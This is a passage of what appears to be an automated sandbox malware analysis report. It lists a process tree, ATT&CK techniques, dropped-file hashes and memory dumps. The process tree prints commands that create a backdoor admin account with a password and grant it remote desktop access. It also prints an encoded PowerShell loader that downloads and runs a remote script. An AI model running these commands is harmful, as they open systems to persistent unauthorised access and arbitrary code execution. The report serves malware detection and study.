  - Suspicious use of WriteProcessMemory
  PID:1216
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
    3⤵
    PID:2860

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc MPmOYrcq /add
1⤵
- Suspicious use of WriteProcessMemory
PID:4104
- C:\Windows\system32\net.exe
  net.exe user wgautilacc MPmOYrcq /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4048
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc MPmOYrcq /add
    3⤵
    PID:2984

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:656
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  2⤵
  PID:1892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    3⤵
    PID:4536

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" NUPNSVML$ /ADD
1⤵
PID:2560
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" NUPNSVML$ /ADD
  2⤵
  PID:3188
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" NUPNSVML$ /ADD
    3⤵
    PID:4856

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:4792
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  2⤵
  PID:3476
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
    3⤵
    PID:4492

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc MPmOYrcq
1⤵
PID:3444
- C:\Windows\system32\net.exe
  net.exe user wgautilacc MPmOYrcq
  2⤵
  PID:5004
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc MPmOYrcq
    3⤵
    PID:4248

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:4028
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:2464

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:556
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1832

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:4476
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:3868
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4140

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
93678e82d776686aa54c42b8a98e6cbc

SHA1
802939dfed99ac74814c4371388b204c5810241d

SHA256
da32a79a8e04cbafb1c5980b3d6225f4705010df5eb45d464cd5bf6b642d7841

SHA512
0b412a1e11c0639d72f6a58c661ecc43da021c010c4d1e66051c5a376ebab287480bbf663345c9bd2a79ec3a35a9788cf04d74d612449f76fe2c87576cd13520

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES1076.tmp

Filesize
1KB

MD5
09e2fe065f0dcf3962ee6302908ea9f8

SHA1
dccd5a92b84d86193cd1b29be528c8c1648db44e

SHA256
37e9a244b313287caab2158db0349feddda79d8d9286ffb3a13e64758ca90f1d

SHA512
6a76af819c921e68dfd4f86555400bfd36b0e8fd7f7ef702d8509f784f7464ea2fe6076652811bca8302a247dc44aafa5acf1d9ca1d6050045cebec20e7dd993

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h0ojjzgf.h1z.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\gph34r5k\gph34r5k.dll

Filesize
3KB

MD5
d28f6ff2c707ad3f1316cffe55f93f0a

SHA1
54e0a0b0568235ea9693cca371d8d5b7044a64a7

SHA256
291b7ea444efd8775bb3c2f04815a89a1920fa3079fe62fc57fd3b74349f62bc

SHA512
c42dbee1fa11269a5b2b55f0daa2ef9240c1edd627091df52be625d00f28337a6e6dd6e082e0644452afde9804b16dad1626225633ebbd444959ed50549b0afe

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
c4bcb62d200b6aa544ed9e5b3399c975

SHA1
7808d467e453b9a8de354af3dab0d10c3e32bee0

SHA256
bd62d13d4264bbd68697866bb1975e7f2fa0b591d71a67856c9a5e7b081beba7

SHA512
87005bc71aa53c5a880d5401378d024033dd0401f267119be02a2d991258becc95916313a55bbe359ec39325593e17b87af02a30cbed2c82672ccea2ac0af745

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
f90a95e65ea4b8785701c5016a5319e3

SHA1
998ff9ca14eecdee37352a362c5929e6ecadf543

SHA256
83e90a20670525dcd14b387165d04c86fd88719b9aa55936318cb5c2a30ef003

SHA512
2ffb491306538032143623a4ea38d0adbe031550ae9e3e973d5e7b48c5737aecab4b92f9d3e50c07e1b70f0e3e1a3b8bc499c6c8d4ff1984ba3971357e1c8578

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
c88ee22ef943b6984da0a92dcbdbb512

SHA1
fe6be3ebdc42c32d5a5842fd34d61c6b217e7454

SHA256
8697ec4ec5cde1fea30fe0f5ccd3e97ef9fafbb392ac0b4404d012a4fc1afa1d

SHA512
108ffb89411d1c0db5ef90d056d91187771ec0103adaa4a97904cb4fd25473208dd4fddc0f6cbba646f21a5d164a5a93c80c989211ceabed863196a4afc319c6

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7546.tmp

Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gph34r5k\CSCEA538CFBCFDF470090806556397D245D.TMP

Filesize
652B

MD5
0f017b4f7f7b4484b155a43bfcde0bd8

SHA1
c15e3eceaaa49f7a036deea2fdade2240da3a91b

SHA256
1ae2b44a90fa4e6775a8b2f1487e1138a96fc0673038382a2e711898d887fad8

SHA512
966e47fdcbd3d95463e14223151d663a5f3b8653cc676628eaf21beb77bb173aea0758dc002bc0aa19eed2f33cee43680e0a1873549a7f44bb3c556756cb8c97

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gph34r5k\gph34r5k.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gph34r5k\gph34r5k.cmdline

Filesize
369B

MD5
0e5a0783b63db73fa46091d62668bcae

SHA1
9b1a6b7605f58884f13cfecab03ebeea964a8685

SHA256
215377d1875d6ec3415248c4612e633ca69c02db1e6845eeb650ee7cf344c4d0

SHA512
eb2ea8ab164c39bb09d6486811ffa149012d46aab9b3d530176d67b57308818536dd04b53214533e1e14960113f3382e9df5c68d3ae9b7df181e93818f4db115

Download Submit
memory/468-84-0x00007FFC81640000-0x00007FFC81659000-memory.dmp

Filesize
100KB

Download
memory/468-41-0x00000232EEF60000-0x00000232EF16A000-memory.dmp

Filesize
2.0MB

Download
memory/468-33-0x00000232EE550000-0x00000232EE558000-memory.dmp

Filesize
32KB

Download
memory/468-155-0x00007FFC72E60000-0x00007FFC73921000-memory.dmp

Filesize
10.8MB

Download
memory/468-19-0x00000232EE360000-0x00000232EE370000-memory.dmp

Filesize
64KB

Download
memory/468-154-0x00007FFC81640000-0x00007FFC81659000-memory.dmp

Filesize
100KB

Download
memory/468-116-0x00000232EE360000-0x00000232EE370000-memory.dmp

Filesize
64KB

Download
memory/468-7-0x00007FFC72E60000-0x00007FFC73921000-memory.dmp

Filesize
10.8MB

Download
memory/468-40-0x00000232EEBD0000-0x00000232EED46000-memory.dmp

Filesize
1.5MB

Download
memory/468-17-0x00000232EE360000-0x00000232EE370000-memory.dmp

Filesize
64KB

Download
memory/468-18-0x00000232EE560000-0x00000232EE582000-memory.dmp

Filesize
136KB

Download
memory/468-85-0x00000232EE360000-0x00000232EE370000-memory.dmp

Filesize
64KB

Download
memory/468-57-0x00000232EE360000-0x00000232EE370000-memory.dmp

Filesize
64KB

Download
memory/468-54-0x00007FFC72E60000-0x00007FFC73921000-memory.dmp

Filesize
10.8MB

Download
memory/468-55-0x00000232EE360000-0x00000232EE370000-memory.dmp

Filesize
64KB

Download
memory/468-56-0x00000232EE360000-0x00000232EE370000-memory.dmp

Filesize
64KB

Download
memory/2308-44-0x000002A0B7DA0000-0x000002A0B7DB0000-memory.dmp

Filesize
64KB

Download
memory/2308-58-0x00007FFC72E60000-0x00007FFC73921000-memory.dmp

Filesize
10.8MB

Download
memory/2308-43-0x000002A0B7DA0000-0x000002A0B7DB0000-memory.dmp

Filesize
64KB

Download
memory/2308-42-0x00007FFC72E60000-0x00007FFC73921000-memory.dmp

Filesize
10.8MB

Download
memory/2428-72-0x00007FFC72E60000-0x00007FFC73921000-memory.dmp

Filesize
10.8MB

Download
memory/2428-69-0x00007FFC72E60000-0x00007FFC73921000-memory.dmp

Filesize
10.8MB

Download
memory/2428-70-0x000001EA7E220000-0x000001EA7E230000-memory.dmp

Filesize
64KB

Download
memory/3076-37-0x00000228EB910000-0x00000228EB920000-memory.dmp

Filesize
64KB

Download
memory/3076-158-0x00007FFC72E60000-0x00007FFC73921000-memory.dmp

Filesize
10.8MB

Download
memory/3076-35-0x00007FFC72E60000-0x00007FFC73921000-memory.dmp

Filesize
10.8MB

Download
memory/3076-0-0x00000228EC480000-0x00000228EC8A6000-memory.dmp

Filesize
4.1MB

Download
memory/3076-39-0x00000228EB910000-0x00000228EB920000-memory.dmp

Filesize
64KB

Download
memory/3076-3-0x00000228EB910000-0x00000228EB920000-memory.dmp

Filesize
64KB

Download
memory/3076-4-0x00000228EB910000-0x00000228EB920000-memory.dmp

Filesize
64KB

Download
memory/3076-2-0x00000228EB910000-0x00000228EB920000-memory.dmp

Filesize
64KB

Download
memory/3076-38-0x00000228EB910000-0x00000228EB920000-memory.dmp

Filesize
64KB

Download
memory/3076-1-0x00007FFC72E60000-0x00007FFC73921000-memory.dmp

Filesize
10.8MB

Download
memory/4140-105-0x00000196FAC80000-0x00000196FAC90000-memory.dmp

Filesize
64KB

Download
memory/4140-106-0x00000196FAC80000-0x00000196FAC90000-memory.dmp

Filesize
64KB

Download
memory/4140-148-0x00007FFC72E60000-0x00007FFC73921000-memory.dmp

Filesize
10.8MB

Download
memory/4140-149-0x00000196FAC80000-0x00000196FAC90000-memory.dmp

Filesize
64KB

Download
memory/4140-104-0x00007FFC72E60000-0x00007FFC73921000-memory.dmp

Filesize
10.8MB

Download
memory/4140-156-0x00007FFC72E60000-0x00007FFC73921000-memory.dmp

Filesize
10.8MB

Download
memory/4732-83-0x00007FFC72E60000-0x00007FFC73921000-memory.dmp

Filesize
10.8MB

Download
memory/4732-73-0x00007FFC72E60000-0x00007FFC73921000-memory.dmp

Filesize
10.8MB

Download